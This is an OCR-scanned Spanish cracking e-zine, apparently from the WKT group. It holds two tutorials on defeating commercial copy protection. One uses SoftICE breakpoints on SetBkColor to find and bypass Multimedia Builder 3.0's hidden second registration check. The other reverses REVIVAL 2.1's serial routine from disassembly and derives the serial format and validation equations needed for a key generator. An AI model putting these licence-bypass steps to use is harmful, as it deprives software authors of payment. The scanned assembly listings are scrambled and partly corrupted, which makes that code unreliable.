La próxima vez esmérate un poco más, aunque he de reconocer que he disfrutado con tu 
protección en grande. 


Notas para los lectores. 


e ”n 


1.- Los mensajes del tipo ''Hazme el crack para ....”, ''Dime como se crackea....”, ''Dime 
donde puedo encontrar...'' son automáticamente ignorados. El objetivo de estos artículos es 
enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten 
la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Estado+Porcino 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 


Recordad bebed de la fuente, buscad a +ORC en la red. 
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INTRODUCCIÓN 


Victima: Multimedia Builder 3.0 
Site: www.mediachance.com 
Herramienta: Nuestro amado Sice y Zen crack. 


Hoy es un día de Heineiken,Café de de Kenya,Moskovkaya,Guiness,Mahon y mujeres. 


Bueno, ya estamos de vuelta con un nuevo truco bajo el brazo: "Crack en Color'' que lo aplicaremos a nuestro conejillo de indias, 
el excelente Multimedia Builder. Un programa para crear aplicacniones que incluyen sonido, imagen,video. Se programa al 
estilovisual de VB . No os perdais el reproductor de CD que viene con el ejemplo. 


UN PRIMER VISTAZO 


Realmente este programador se lo ha currado. Ha cerrado la mayoría de las puertas de entrada a los crackers, por tanto hay que 
abrir otras como el "Crack en Color". Veamos alguno de sus ingenios del autor: 


- Existe un número de serie que se introduce desde ''HelplAboutRegister" 


- Cuando introducimos un número de serie falso no aparece ninguna ventana de error. 
Por lo que queda descartado el clásico ''bpx messageboxexa". 


- Las cadenas de caracteres importantes las tiene encriptadas, por lo que no podemos buscarlas con el ''Search and Replace", lo 
que impide un crack en 5 minutos. 


PRIMER OSTIAZO 


Desechados los ataques típicos, vamos a entrar por la puerta clásica siguiendo la pista del Serial falso. 


Metemos un número basura ''12121212", Saltamos al sice y ponemos 's 30:00 1 f££fffff "12121212"" 

¡En cada ocurrecia XX:xx aplicamos 'bpr XX:xx XX:xx+8 rw'. Una vez acabado damos al botón de OK y BOOM, aparecemos en el 
¡sice. Unos F12 llegamos a la rutina "GetwindowTextA". 

Dejamos esta línea de trabajo porque es muy aburrida. 


¡Al final conseguimos aislar una rutina en que devuelve 0 si estamos registrados y 1 en otro caso.Podemos falsearla para 
¡registrarnos. Y de hecho lo ''conseguimos"'. Nuestro nombre aparece en la ventana de registro. Pero hay una sorpresita. Si 
ejecutamos Project/Run aparece "unregistered...''. ¿Cómo es posible? 


¡Pero SI estamos registrados!. La cosa es aún peor, si nos peleamos con el registro y generamos un número de serie válido las cosas 
¡no mejorar. ¿Que está pasando aquí? 
¡ZEN CRACK 


¡Si hemos pasado el algoritmo de registro satisfactoriamente, ¿porqué seguimos sin estar registrados?. 
¡Razonemos, la única forma de no estar registrados es que no pasemos alguna verificación. Sabemos que hemos pasado una, luego 
debe de haber otra verifiación en otra parte del código. 


¡Este programador ha pensado un poco. HA SEPARADO LAS COMPROBACIONES del serial. 
'Y lo que es todavía más interesante, en cada comprobación analiza cosas diferentes. Así, si se pasa completamente una 
¡comprobación no se garantiza que se pase el resto. 


¡Sabemos ya que por lo menos hay dos comprobaciones (una que pasamos y otra no). 

¡Debe existir un nexo de unión entre las comprobaciones: Una variable que guarde el serial que hemos introducido. Pero aquín las 
variantes son múltiples :la primera comprobación puede encriptar el serial para la segunda, modificar un flag para que siempre 
resulte falsa la segunda comprobación... 


¡La pregunta que se plantea es ¿Cómo localizo la segunda comprobación?. 

¡La única pista es el horrible letrero amarillo ".. unregistered ..'. Se podrían analizar todas las variables que modifica el primer 
¡algoritmo , pero eso es demasiado costoso. Debemos buscar otra forma. 

¡La única forma de saber que no hemos pasado las comprobaciones es el letrero amarillo. Es por ahí por donde debemos atacar. 


¡El mensaje está encriptado ,luego desechamos esa vía. 
¡El letrero parece un Label al estilo de de JAVA o Delphi, por lo que no tiene entidad propia como una ventana. 
¡¿Por donde atacamos? 


CRACK EN COLORES 


Centremonos, ¿qué es lo que má llama la atención del letrero? , su color amarillo. 

¡Este color debe de asignarse de alguna forma. Además el amarillo parece que es el color de fondo del letreo. Si desensamblamos a 
¡nuestro objetivo vemos que utiliza la función setbkcolor. 

¡Así pues debemos localizar algo parecido a "setbkcolor(Amarillo)".Pero como se expresa exactamente el color amarillo. 


¡Normalmente los colores se forman a partir de la combinación de los llamados ''colores básicos” . 

¡Lo normal es usar como colores básicos RGB="Rojo Verde y Azul.' Nuestro problema es como expresar el amarillo del letrero en 
función de RGB. Por suerte nuestro amarillo es una simple combinación. Podemos utilizar la paleta de colores de cualquier 
¡programa para comprobarlo. En mi caso he usado el Visual Café 2.5 (crackeado por supuesto). 

¡Introduciendo Rojo=255,Verde=255,Azul=0 obtenemos el mismo amarillo que el del letrero. 


¡Si el color hubiera sido más complejo,capturamos la pantalla con el letrero y la importamos a un editor gráfico como el 
Photoshop.Seleccionamos un pixel del color amarillo del letreo y vemos sus componentes en términos de Rojo, Verde y Azul. 
Es posible que exita un program que realize esta función más sencilla. Si lo encontris, por favor notificádmelo. 


Asi pues debemos de localizar algo asi como "setbkcolor(255 255 0)". Necesitamos conocer si existen más parámetros para el 
¡setbkcolor. Mirando el API tenemos: 


COLORREF SetBkColor (HDC hdc, // handle of device context 
COLORREF crColor // background color value 
y; 

The COLORREF value is a 32-bit value used to specify an RGB color. 


When specifying an explicit RGB color, the COLORREF value has the following hexadecimal form: 
Ox00bbggrr 


Nuestro color es un entero y se pasa como segundo parámetro. Dado que los número se almacenan al revés debemos buscar 
SetBkColor(hdc,0000ffff). Desempolvemos los manuales del Sice, por lo que nos queda 


bpx setbkcolor if (*(esp+8)==ffff0000) 


Expliquemos un poco el churro que ha aparecido. bpx setbkcolor indica que se pare cuando se ejecute la rutina setbkcolor Se para 
cuando (*(esp+8)==00ffff), es decir, cuando el contenido del registro EIP+8 sea O0ffff. Recordemos que los parámteros a las 
funciones se pasan a través de la pila (ESP=registro stack pointer): 


Concretamente es ESP+8 porque en se apilan dos palabra de 4 bytes cada uno. 


Antes de la llamada ESP=000 
Llamada ESP=Dirección de retorno. (palabra de 4 bytes) 
ESP+4=parámetro HDC. (palabra de 4 bytes) 
ESP+8=segundo parámetro 


Aplicando nuestro bpx y pulsando "Proyect/Run'" BOOM, aparecemos en el sice, para ver si estamos realmente ante el setbkcolor 
correcto, cambiemos el color 'd esp+8' Y pasamos de '"'FFFEF00" a "FFFFFF". 
Obtenemos un bonito color blanco de fondo. Luego hemos pillado la llamada correcta. Un par de £12 después obsevamos 


:460a15 cmp [ESI+378],43CA 


Si los valores no son iguales vemos el mensaje de error. Por tanto es este el flag que controla todo. Ya sólo basta ver quien lo 
inicializa. Pero este es un trabajo conocido por todos que lo dejo como ejercicio. 


Fijaos como no se utiliza un clásico flag 1,0 sino un valor difícil 0x43CA. Un nuevo síntoma de que el autor ha leido sobre cracks. 


CONCLUSIÓN 


Hemos aprendido una nueva técnica: '"Color Crack". Es recomendable que se aplique cuando el mensaje de "unregistered ''no sea 
una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Sice: 


bpx nombreRutina if (*(esp+8)==00BBGGRR) 
Recordad que los valores de Blue(azul),Green (Verde) , Red (rojo) están hexa. 


Cuando apararezcamos en el Sice cambiar el color para ver si estamos en la ventana correcta. En tal caso buscar un salto que evite 
el mesaje. 


Este técnica siempre es aplicable, pero se recomienda que se utulize cuando existan pocos colores en la ventana y el mensaje esté 
resaltado del resto (cosa bastante habitual). 


Una posible generalización de está técina es aplicable al color del tipo de letra (foregroundcolor), el tipo de fuente, (setFont), el 
aspecto (cursiva ...). Recordad de echar mano de una buena ayuda Api para win32. 


No olvidemos el esquema de protección tan original de SEPARACIÓN DE COMPROBACIONES que ha implementado el autor. 
Realmente interesante, si señor. 


Notas para los lectores. 


1.- Los mensajes del tipo 'Hazme el crack para ....'', "Dime como de crackea....*', ''Dime donde puedo encontrar...” son 
automáticamente ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo 
saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK £ WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcinoO hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 
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INTRODUCCIÓN 


¡Saludos Familia! 


Aprovechando las vacas estivales me he decidido por escribir un bonito Generador de Llaves (en inglés KeyGen) para un útil programa 
de reparación de discos duros y disquetes. Como siempre un poco de Teoría para que podamos entendernos. 


Generadores de Llaves. 


La primera pregunta que responder es ¿qué carajo es un Generador de Llaves? Suponed por un instante que sois unos de esos 
programadores perezosos y cegados por el dinero que ha construido un programa protegido con un número de serie. Si alguien desea 
registrarse debemos pagar una cifra de dinero (pequeña o no) que hará engrosar nuestra cuenta. A cambio debemos de enviarle un 
número de serie que desbloquee el programa. ¿Hasta ahora todo correcto, verdad?. ¿Pero como demonios se genera un número de serie 
diferente para cada usuario? . La respuesta es: con un Generador de Llaves. 


Existen dos tipos de Generadores de Llaves: 


A- Dependientes de los datos del cliente. 
B- Independientes de los datos del cliente. 


El tipo A es el más extendido, el número de serie se genera a partir del nombre del cliente y el de su dirección de correo (por ejemplo). Así 
dos usuarios tendrán números de serie diferentes, por que en principio sus datos personales son diferentes. 


El tipo B está un poco en desuso, pero se siguen viendo por que son fáciles de programar (recordad que los programadores son por 
naturaleza vagos y sin imaginación). 

El mismo número de serie es válido para cualquier cliente. En estos casos, el programador da un número diferente a los clientes pardillos 
que compran su producto y reza para que no se lo den a nadie. 


¿Es posible crear un Generador de Llaves? 


El programa Generador de Llaves está normalmente en el ordenata del programador, entonces, ¿cómo demonios puede un cracker 
construir un Generador ?. La respuesta es sencilla pero difícil (en general) de realizar. 

El programa debe verificar que el número de serie que introducimos es válido y ésto sólo puede hacerlo verificando ciertas propiedades 
que debe cumplir el número de serie y que fueron establecidas por el Generador. 

¿Un poco lioso verdad?, dicho de otra forma, el Generador es un codificador de números de serie y en el programa sólo existe un 
decodificador que descifra el número de serie introducido. 


Vemos un sencillo ejemplo, suponed que nuestro Generador es el siguiente: 
NúmeroSerie=(89934*4)*(nombre(5)) 


Donde nombre(5) es la quinta letra del nombre del usuario. EL número 89934 es el llamado número mágico, un número que es de agrado 
del programador (quizás el número de veces que le ha su jefe le ha jodido) y que realmente es el corazón del Generador 


En el programa, para ver que el número de serie es correcto se debe de verificar: (NúmeroSerie/(4 /nombre(5)) = 89934 


Como podéis apreciar, lo que hay en el programa es la inversa del Generador, por tanto si invertimos la inversa podemos obtener el 
Generador de Partida. 


No os engañéis, este es un Generador sencillo, lo normal es que esté ultra enrevesao , lleno de números mágicos y operaciones aritméticas 
exóticas. 


Normalmente, las rutinas de verificación realizan ciertas comprobaciones sobre la password de entrada. Generalmente pasan a mayúsculas 
y buscan ciertos caracteres en ciertas posiciones. En caso de no encontrarlos la password no es válida. Esto da pie a un truco mu útil pa 
localizar di una forma directa la rutina. Pero esto lo veremos más adelante. 


¿Pos mu bien, pero que necesito pa hacer un Generador de Llaves? 


1.- Lo primero es aislar el código del programa que verifica el número de serie. 
Además del código que las funciones que son llamadas desde la rutina de verificación (pa Saber que narices hacen). Normalmente las 
rutinas de verificación hacen uso de pequeñas rutinas: convertir a mayúsculas,convertir letras en números... 


2.- Un conocimiento exhaustivo, repito, exhaustivo del la rutina de verificación. 

Debemos saber TODO lo que hace y porqué lo hace. Recordad que tenemos que invertir su funcionamineto y esto no lo podemos hacer si 
no sabemos como funciona. Este es el punto más delicado y el que consume más tiempo. Dependiendo de las paranoias del programador 
podéis tardar horas o semanas. Se necesitan conocimientos de ensamblador y de operaciones aritméticas binarias 


3.- Invertir el funcionamineto del Generador y crear con un compilador, por ejemplo de C nuestro propio Generador. 


¿Merece la pena hacer un Generador? 


La respuesta es depende. Hacer un Generador no es nada sencillo, consume mucho tiempo y habilidades. Es mucho más fácil parchear la 
rutina de verificación para que acepte cualquier cosa. 


Pero las ventajas de crear un Generador son muy importantes, primera y ante todo es que realmente se está cumpliendo con la filosofía 
crack (ingeniería inversa) al comprender y transformar el programa para que adapte a nuestras necesidades. 


Segúnda ventaja son los conocimientos que se captan sobre todo a nivel ensamblador y de operaciones aritméricas con bits. 
Tercera y no más importante la satisfacción del trabajo artesano, bien hecho. Esa satisfacción que nos hace seguir adelante. 


La cuarta ventaja tiene que ver con la historia del Software. Puedes ''coleccionar"' las protecciones de tu programa favorito y ver la 
evolución de su software. 


Y como quinta un fin práctico, al final del proceso se obtiene un número de serie válido, lo que te convierte en un usuario "legal'' y 
¡problamente no tengas que crakear la próxima versión. 


Generador de Llaves para REVIVAL 2.1. 
Objetivo: REVIVAL 2.1 


Nombre: revive21.zip 

Tamaño: 874.644 bytes 

Versión: 2.1 

Site: http://uc2.unicall.be/revival/ 

Herramientas: Softlce,W32dasm o IDA 3.75 y un compilador de C. 
Dificultad: No mu difícil. 

Tiempo: 5 horas. 


Este es un interesante programa que te permite recuperar ficheros borrados de discos duros y disquetes que soporta FAT32 y NTEFS. Tiene 
una típica ventana de registro a partir de la cual podemos acceder directamente a la rutina de verificación de la pass. Esta rutina es 
extremadamente sencilla e independiente de los datos del usuario, por eso ha sido la elegida como demostración. 


Aconsejo desensamblar con el IDA PRO 3.75(una pequeña maravilla de desensamblador). Se puede hacer con el W32dasm pero el IDA nos 
da más información y nos ahorra trabajo. Por ejemplo descubre de forma automática rutinas (_touper, isdigit...) que no son reconocidas 
como tales por el W32dasm. 


Bien, manos a la obra, desensamblemos con el IDA. 


¿Ya está? 

Bien, ahora sólo hay que localizar la rutina de verificación. Empleemos un viejo truco: el 80% de las rutinas de verificación intentan 
localizar el carácter '-' (2D en hexa) o el carácter '+' (2B en hexa). 

No me preguntéis por qué, pero lo hacen. Sólo hace falta buscar un 2Dh o un 2Bh y con un poco de suerte aterrizaremos en plena rutina de 
verificación. Debemos buscar una comprobación con 2Dh o bien 2Bh, pero como las comprobaciones pueden ser de muchos tipos , sólo 
buscaremos la parte final de la comprobación. 


Resumiendo, buscaremos ', 2Dh" y ", 2Bh". En caso de existir demasiadas ocurrencias, mejor decantarse por otro método de ataque. Al 
final es el olfato de cracker el que te indica si estás en la ocurrencia correcta o no. 

En este caso hay 20 ocurrencias de ''2D"' y 18 de ''2B". UFF, quizás demasiadas (de hecho es la primera ocurrencia de ''2D" la correcta), 
así que probemos un método más directo con el Softice. 


Metemos como nombre ESTADO, como campañía PORCINO y como número de serie estúpido por ejemplo 1212121212. CTRL+D y le 
damos al botón de OK y aparece una ventana de error. 


Esta ventana se parece a un messageboxexa (por su simplicidad y por el icono en forma de exclamación y por el único botón que aparece). 
Si repetimos el mismo proceso pero poniendo en el softice bpx messsageboxexa y pulsamos el botón de OK ... 

Bingo, aparecemos en la rutina de messageboxexa. Sólo hay que seguir la secuencia de llamadas hacia atrás buscando un salto que evite 
llamar a la ventana de mensaje de error. La secuencia de pasos es: 


* Paramos en bpx messageboxexa 

* Pulsamos F12 para llegar a la rutina padre que llamó a messageboxexa. 

* Aparecemos en :4313CA pero por se ve ningún salto que evite la llamada a messageboxexa. 
* Pulsamos F12 para seguir subiendo hasta la rutina padre. 

* Aparecemos en :43145D. Pero de nuevo nada interesante. 

* De nuevo Fl2 y .... 

* Aparecemos en :40CAAGCS, esta si tiene lo que buscamos, exactamente. 


0040AA6C Call sub_40CD10 ; RUTINA DE VERIFICACIÓN 
0040AA71 add esp, 4 

0040AA74 test eax, eax 

0040AA76 jz short loc_40AABA; SALTA SI ERES UN MAL CRACKER. 
0040AA78 mov dword ptr [esi+5Ch], 1 

0040AA7F mov eax, [esi+64h] 

0040AA82 push eax 

0040AA83 push offset aName; NOMBRE. 

0040AA88 Call sub_40AD70 

0040AA8D add esp, 8 

0040AA90 mov eax, [esi+60h] 

0040AA93 push eax 

0040AA94 push offset aCompany; COMPAÑÍA. 

0040AA99 Call sub_40AD70 

0040AA9E add esp, 8 


0040AAA1 mov eax, [edi] 


0040AAA3 push eax 


0040AAA4 push offset aSerial;NÚMERO DE SERIE. 

0040AAA9 Call sub_40AD70 

0040AAAE add esp, 8 

0040AAB1 mov ecx, esi 

0040AAB3 call sub_42550E 

0040AAB8 jmp sh 

0040AABA ; ÁRA anun a 

0040AABA 

0040AABA loc_40AABA: ; CODE XREF: sub_40AA20+56_3 
0040AABA push OFFFFFFFFh 

0040AABC push 30h 

0040AABE push OEF1Fh ; DIRECCION DEL MENSAJE DE ERROR 
0040AAC3 Call sub_431413 ¡ VENTANA DE MESAJE DE ERROR 
0040AAC8 mov ecx, esi 

0040AACA Call sub_425527 

0040AACF 

0040AACF loc_40AACF': ; CODE XREF: sub_40AA20+98_3 
0040AACF push OFFFFFFFFh 

0040AAD1 mov ecx, edi 

0040AAD3 call sub_429A33 

0040AAD8 pop edi 

0040AAD9 pop esi 

0040AADA retn 

0040AADB ; ARAAARAARAMARAMARAARA RRA RARA RARA RA RARARARAMARARARARAMARARARARARARARARA AA RAR 
0040AADB 

0040AADB loc_40AADB: ; CODE XREF: sub_40AA20+25_3 
0040AADB ; sub_40AA20+40_3 

0040AADB push OFFFFFFFFh 

0040AADD push 30h 

0040AADF push OEF1Eh 

0040AAE4 Call sub_431413 

0040AAE9 pop edi 

0040AAEA pop esi 

0040AAEB retn 

0040AAEB sub_40AA20 endp 


Fijaos en el salto en :40AA76. Si saltamos caemos en la ventana de mensaje y evitamos acceder a NOMBRE,COMPAÑÍA y NÚMERO DE 
SERIE. El salto está controlado por :40AA6C call sub_40CD10 .Que interesante, una rutina que controla la ventana de mensaje de error, 
¿a qué nos suena ésto?. BINGO, estamos ante la rutina de verificación. 

Échemósle un vistazo y comentémosla. 


¡Desensamblado con el IDA ;p(0) indica el carácter 0 de la password. Recordad, empiezo a contar los caracteres desde 0. 


0040CD10 sub_40CD10 proc near ; CODE XREF: sub_404600+98_p 

0040CD10 ; sub_40AA20+4C_p 

0040CD10 

0040CD10 var_24 = byte ptr -24h ; 1 variable local. 

0040CD10 var_20 = word ptr -20h ; 2 variable local. 

0040CD10 var_1E = byte ptr -1Eh ; 3 variable local. 

0040CD10 var_1B = byte ptr -1Bh ; 4 variable local. 

0040CD10 arg_0 = dword ptr 4 ; Argumento de la función que no es más que la dirección 
de nuestra password. 

0040CD10 

0040CD10 sub esp, 24h; Ajusta la pila para reservar espacio para las varibles 
locales. 

0040CD13 push ebx; Guarda algunos registros. 

0040CD14 push esi 

0040CD15 mov esi, [esp+2Ch+arg_0] ; esi= dirección de nuestra password. 
0040CD19 push edi 

0040CD1A movsx eax, byte ptr [esi] ; eax=p(0) 

0040CD1D push eax 

0040CD1E Call _toupper ; Pasamos a mayúsculas p(0). 

0040CD23 add esp, 4 


0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 


0040CD29 
0040CD2F 
0040CD33 
0040CD34 
0040CD39 
0040CD3C 
0040CD3F 
0040CD45 
0040CD49 
0040CD4F 
0040CD50 
0040CD56 
0040CD59 
15 

0040CD5F 
0040CD64 
0040CD64 


0040CD64 
0040CD68 
0040CD69 
0040CD6E 
0040CD71 
0040CD73 
número. 

0040CD79 
0040CD7A 
0040CD7D 
0040CD7F 


0040CD84 
0040CD84 
0040CD84 
0040CD88 
0040CD89 
0040CD8E 
0040CD91 
0040CD93 
0040CD99 
0040CD9A 
0040CD9D 
0040CD9F 
0040CDA3 
0040CDA8 
0040CDAC 
0040CDB1 
0040CDB2 
0040CDB7 
0040CDBB 
0040CDBE 
0040CDC3 
0040CDC5 
0040CDC9 
0040CDCD 
0040CDD2 
0040CDD3 
0040CDD8 
0040CDDC 
0040CDDF 
0040CDE2 
0040CDE5 
0040CDE6 
0040CDE8 
0040CDEA 
0040CDED 
0040CDFO 


loc_40CD64: 


loc_40CD84: 


jnz loc_40CE7F ; Salta a flag de error si p(0) no es R. 
movsx eax, byte ptr [esi+1] ; eax=p (1) 
push eax 
Call _toupper ; Pasamos a mayúsculas p(1). 
add esp, 4 
cmp eax, 56h ; ¿ES P(1) = Vv? 
jnz loc_40CE7F ; Salta a flag de error si p(1) no es V. 
cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 
jnz loc_40CE7F ; Salta a flag de error si p(7) no es '-'. 
push esi 
Call ds:1istrlenA ; Calcula el tamaño de la password. 
cmp eax, OFh ; ¿Es el tamaño 15? 
jnz loc_40CE7F ; Salta a flag de error si el tamaño no es 
mov edi, 2 ; Segundo carácter. 
; CODE XREF: sub_40CD10+6D_3 
¡Bucle para comprobar que son números p(2)...p(6) 
movsx eax, byte ptr [edi+esil]; eax=p (2) 
push eax 
Call _isdigit ; ¿es un número p(2)? 
add esp, 4 
test eax, eax 
Jz loc_40CE64 ; Salta con flag de error si p(2) no es 
inc edi ; Apuntamos al siguiente carácter. 
cmp edi, 7 ; ¿Hemos llegado a p(7)? 
31 short loc_40CD64 ; Salta si no hemos llegado a p(7). 
mov edi, 8 ; Octavo carácter. 
¡Bucle para comprobar que son números p(8)...p(14) 
; CODE XREF: sub_40CD10+8D_3 
movsx eax, byte ptr [edi+esi];; eax=p (8) 
push eax 
Call —_isdigit ¡;¿es un número p(8)? 
add esp, 4 
test eax, eax 
Jz loc_40CE6D ; Salta con flag de error si p(8) no es número. 
inc edi ; Apuntamos al siguiente carácter. 
cmp edi, OFh ; ¿Hemos llegado a p(15)? 
31 short loc_40CD84; Salta si no hemos llegado a p(15). 
mov ax, [esi+2] ; ax=p(2)p(3) 
mov [esp+30h+var_20], ax 
lea eax, [esp+30h+var_20] 
mov [esp+30h+var_1E], O 
push eax 
Call _atoi ¡Pasa p(2)p(3) a número. 
mov cx, [esi+5] ¿cx=p (5)p(6) 
add esp, 4 
mov [esp+30h+var_20], cx 
sub al, 13h ; al=p(2)p(3)-19 
lea ecx, [esp+30h+var_20] 
mov [esp+30h+var_24], al 
mov [esp+30h+var_1E], O 
push ecx 
call _atoi ¡Pasa p(5)p(6) a número. 
lea edx, [esp+34h+var_20]; 
add esp, 4 
lea ebx, [eax-25h] ¿ebx=p (5)p (6) -37 
lea ecx, [esi+0Ah] ¡ecx=dirección de p(10) 
push edx 
mov eax, [ecx] ¿ebx=p (10)p (11)p (12)p (13) 
mov [edx], eax 
mov cl, [ecx+4] ¿;cl=p (14) 
mov [edx+4], cl 
mov [esp+34h+var_1B], O 


0040CDF5 Call 
0040CDFA add 
0040CDFD mov 
0040CDFF xor 
0040CE04 mov 
0040CE08 mov 
0040CE0D lea 
0040CE11 mov 
0040CE16 movzx 
0040CE19 push 
0040CE1A Call 
0040CE1F mov 
0040CE23 add 
0040CE26 xor 
0040CE28 mov 
0040CE2D mov 
0040CE2F mov 
0040CE34 lea 
XOR 21508) + 3 

0040CE38 cda 
0040CE39 idiv 
0040CE3B mov 
0040CE3D xor 
0040CE3F mov 
0040CE43 lea 
21508) + 3 

0040CE47 cdg 
0040CE48 idiv 
0040CE4A sub 
0040CE4D cmp 
0040CE50 jnz 
0040CE52 cmp 
0040CE56 jnz 
p(4) 

0040CE58 mov 
0040CE5D pop 
0040CE5E pop 
0040CE5F pop 
0040CE60 add 
0040CE63 

0040CE64 ; 

0040CE64 

0040CE64 loc_40CE64: 

0040CE64 

0040CE66 

0040CE67 

0040CE68 

0040CE69 

0040CE6C 

0040CE6D ; 

0040CE6D 

0040CE6D loc_40CE6D: 

0040CE6D xor 
0040CE6F pop 
0040CE70 pop 
0040CE71 pop 
0040CE72 add 
0040CE75 

0040CE76 ; 


_atoi ¡Pasa p(10)p(11)p(12)p(13)p (14) a número. 
esp, 4 

edi, eax 

di, 5468h ¿di=p(10)p(11)p(12)p(13)p (14) XOR 21508 
ax, [esi+8] ¡ax=p (8)p(9) 


[esp+30h+var_20], ax 

eax, [esp+30h+var_20] 

[esp+30h+var_1E], O 

edi, di 

eax 

_atoi ¡Pasa p(8)p(9) a número. 
byte ptr [esp+34h+var_20], al 

esp, 4 

eax, eax 

ecx, 64h 

al, bl ¡al=p (5)p(6)-37 

ebx, 0Ah 

eax, [eaxtedi+3]; eax'=(p(5)p(6)-37)+(p(10)p (11)p (12)p (13)p (14) 


ecx ¡Divide eax'/100 

cl, dl ¡¿Ccl=resto (eax'/100) 

eax, eax 

al, [esp+30h+var_24] 

eax, [eaxtedi+3]; eax=(p(2)p(3)-19)+(p(10)p (11)p(12)p(13)p (14) XOR 


ebx ¡Divide eax/10 
dl, [esi+4] ¿dl=resto (eax/10)-p (4) 
dl, ODOh ;¿Es resto(eax/10) = p(4)? 


short loc_40CE76;Salta a flag de error si resto(eax/10) no es p(4) 
byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)? 
short loc_40CE76;Salta a flag de error si resto(eax'/100) no es 


eax, 1 ; Ok todo correcto. Flag de éxito activado. 
edi 

esi 

ebx 

esp, 24h 


; CODE XREF: sub_40CD10+63_3 
eax, eax ; Eres un mal chico.Flag de error activado. 
edi 
esi 
ebx 
esp, 24h 


; CODE XREF: sub_40CD10+83_3 
eax, eax ; Eres un mal chico.Flag de error activado. 
edi 
esi 
ebx 
esp, 24h 


Antes de seguir adelante, centremonos en un par de puntos: 


- ¿Habéis descubierto los números mágicos?, sip los hay son 5468h, OAh y 64h. 

- Como es tradición la rutina checkea en este caso la presencia del carácter '-. 

Luego con un poco de paciencia, nuestra búsqueda inicial hubiera tenido sus frutos. 

- Habéis notado la pésima calidad del código. Uso innecesario de variables, instrucciones inútiles, tamaño del código exagerado. Todo esto 


es debido a que se programó en alto nivel, seguramente en C. 

¿Cómo quieren los programadores proteger su software si es de pésima calidad?. Están directamente vendidos (salvo honrosas 
excepciones, por supuesto.) 

- Si andais un poco pegaos de operacones aritméticas y de ensamblador, buscad alguno 

de los fabulosos cursos de ensamblador que hay en la Web. 


Resumamos los momentos más interesantes de la rutina de verificación: 


A) 0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 

B) 0040CD3C cmp eax, 56h ; ¿ES P(1) = V? 
C)0040CD45 cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 

D) 0040CD56 cmp eax, OFh ; ¿Es el tamaño 15? 
E) 0040CD64 ¡Bucle para comprobar que son números p(2)...p(6) 
F) 0040CD84 ¡Bucle para comprobar que son números p(8)...p(14) 
G)0040CDC3 sub al, 13h ; al=p(2)p(3)-19 

H) 0040CDDF lea ebx, [eax-25h] ; ebx=p(5)p(6)-37 

1) 0040CE34 lea eax, [eax+edi+3] ; eax'=(p(5)p(6)- 


37)+(p(10)p(11)p(12)p(13)p (14) 
XOR 21508) + 3 
J) 0040CE3B mov cl, dl ; Ccl=resto(eax'/100) 
K) 0040CE43 lea eax, [eax+edi+3] ; eax=(p(2)p(3)- 
19)+(p(10)p(11)p(12)p(13)p (14) 
XOR 21508) + 3 
L) 0040CE4D cmp dl, O0DOh ;¿Es resto(eax/10) = p(4)? 
M) 0040CE52 cmp byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)?. 


Por A),B),C),D),E) y F) sabemos que la password debe de tener este aspecto: 


00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 
RVX XX XxX X - X X X X X X X Xx 


Donde x es un número del 0 al 9. 


Despues hay dos bonitas ecuaciones: 


Por H),1),J) y M) 
I) p(8)p(9)=resto( (p(5)p(6)-0x25)+(p(10)p(11)p(12)p(13)p(14) XOR 21508) + 3) / 0x64) 


Por G),K),L) 
11) p(4)=resto ( (p (2)p (3) -0x13)+(p(10)p(11)p(12)p (13)p(14) XOR 21508) + 3) / 0Ox0A) 


Pos ya está. Estas son las ecuaciones de la rutina de verificación, ya se puede implementar nuestro propio Generador de Llaves, que no será 
más que implementar estas dos ecuaciones. 

Estas dos ecuaciones comprueban que la parte derecha sea igual a la parte izquierda (p(S)p(9) y p(4)). Nuestro Generador calculara la 
parte derecha y construirá la parte izquierda de forma adecuada. Se podrían simplificar un poco, pero no lo haré pa no complicar el 
asunto. 


Un posible Generador en C sería algo así como: 


VER CODIGO FUENTE DEL GENERADOR 


Utilizo números aleatorios (random) para generar un número de serie diferente cada vez que se ejecute e programa. Una última curiosidad, donde 
creereis que guarda nuestra pass el programa. Si lanzais el La utilidad regmon (analiza todos los accesos al Registro dels Sistema) con el programa, 
podréis apreciar que se accede a "HKEY_LOCAL_MACHINEISSOFTWARERevivallRevivalN2.0Serial" Poco imaginativo, ¿verdad?. Podéis 
modificar este número para evitar registraos y probad Con nuevas pass. 


Notas para los lectores. 


1.- Los mensajes del tipo "Hazme el crack para ....'*, ''Dime como de crackea....'*, ''Dime donde puedo encontrar...'' son automáticamente 
ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


